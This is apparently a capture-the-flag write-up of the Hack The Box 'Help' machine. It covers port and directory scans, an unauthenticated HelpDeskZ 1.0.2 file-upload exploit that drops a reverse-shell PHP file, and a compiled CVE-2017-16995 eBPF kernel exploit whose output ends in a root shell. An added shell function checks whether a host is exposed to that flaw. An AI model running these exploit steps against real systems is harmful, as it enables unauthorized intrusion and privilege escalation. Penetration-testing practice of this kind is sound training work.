Help Linux · Easy - Adventure mode

🔭 Reconnaissance:

└─$ nmap -p- -sSVC --min-rate 5000 10.129.230.159
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-12 11:45 +0100
Nmap scan report for 10.129.230.159
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.17 seconds

(image: help_graphql)

It seems there is another path to exploit this machine, but in this case I did not follow it.

┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://help.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/reports/http_help.htb/_26-02-12_11-59-26.txt
Target: http://help.htb/
[11:59:26] Starting:
[11:59:32] 403 -  294B  - /.ht_wsr.txt
[11:59:32] 403 -  299B  - /.htaccess.sample
[11:59:32] 403 -  297B  - /.htaccess.bak1
[11:59:32] 403 -  298B  - /.htaccess_extra
[11:59:32] 403 -  295B  - /.htaccess_sc
[11:59:32] 403 -  297B  - /.htaccess_orig
[11:59:32] 403 -  295B  - /.htaccessOLD
[11:59:32] 403 -  295B  - /.htaccessBAK
[11:59:32] 403 -  297B  - /.htaccess.save
[11:59:32] 403 -  296B  - /.htaccessOLD2
[11:59:32] 403 -  297B  - /.htaccess.orig
[11:59:32] 403 -  287B  - /.htm
[11:59:32] 403 -  288B  - /.html
[11:59:32] 403 -  297B  - /.htpasswd_test
[11:59:32] 403 -  293B  - /.htpasswds
[11:59:32] 403 -  294B  - /.httr-oauth
[11:59:34] 403 -  288B  - /.php3
[11:59:34] 403 -  287B  - /.php
[12:00:23] 301 -  309B  - /javascript  ->  http://help.htb/javascript/
[12:00:55] 403 -  296B  - /server-status
[12:00:55] 403 -  297B  - /server-status/
[12:01:01] 301 -  306B  - /support  ->  http://help.htb/support/
[12:01:01] 200 -    1KB - /support/
Task Completed

I discover a web site at http://help.htb/support/

(image: help_support)

💣 Preparation:

https://github.com/JubJubMcGrub/HelpDeskZ-1.0.2-File-Uplaod

I found the following exploit and decided to fork it because it was written in Python 2, so I adapted it, since the code seemed good quality to me for being simple and clear.

https://github.com/pmartinezrhub/HelpDeskZ-1.0.2-File-Upload

🪲 Exploitation:

The full explanation of the exploit: https://www.exploit-db.com/exploits/40300

👽 Actions:

┌──(exploits)(pmartinezr㉿kali)-[~/htb/help/exploits]
└─$ python helpdeskz.py http://help.htb/support/uploads/tickets/  rev.php
HelpDesk v1.0.2 - Unauthenticated shell upload
found!
http://help.htb/support/uploads/tickets/08b19dc5fc119d365afdf14628bceda9.php
help@help:/home/help$
/home/help$ cat user.txt
263ce46a5ef72b70************

First flag

[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

I uploaded Linpeas.sh and it suggests a kernel exploit.
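A defensive check, added here as an example and not part of the original post: the suggester's own comment says the exploit needs kernel.unprivileged_bpf_disabled != 1, so this POSIX shell function reads that sysctl and reports whether the host is still exposed (the optional file-path argument is an assumption of this example, so it can be tested against a constructed file).

```shell
#!/bin/sh
# Classify the host against the condition the exploit suggester cites:
# "kernel.unprivileged_bpf_disabled != 1". Reads the sysctl value from
# /proc by default; a custom path can be passed for testing.
bpf_status() {
    file="${1:-/proc/sys/kernel/unprivileged_bpf_disabled}"
    if [ ! -r "$file" ]; then
        # No sysctl file: the bpf() syscall is not exposed on this kernel
        # (e.g. CONFIG_BPF_SYSCALL not set), so the precondition fails.
        echo "no-bpf-syscall"
        return 0
    fi
    value=$(cat "$file")
    case "$value" in
        1) echo "mitigated" ;;          # unprivileged bpf() denied, cannot be re-enabled without reboot
        2) echo "mitigated-runtime" ;;  # denied, but an admin can still set it back to 0
        0) echo "exposed" ;;            # unprivileged users may load eBPF programs
        *) echo "unknown:$value" ;;
    esac
}

# Stand-alone usage: report the real host value.
bpf_status
```

The "exposed" result only means the precondition holds; whether the running kernel is actually affected still depends on its version and patch level.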

help@help:/home/help$ gcc -o exp 45010.c
help@help:/home/help$ ./exp
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003686d200
[*] Leaking sock struct from ffff88003c65f400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003b69c840
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003b69c840
[*] credentials patched, launching shell...
# whoami
root

We have to compile the exploit on the machine itself because this is old stuff.

(image: achivement)

This post is licensed under CC BY 4.0 by the author.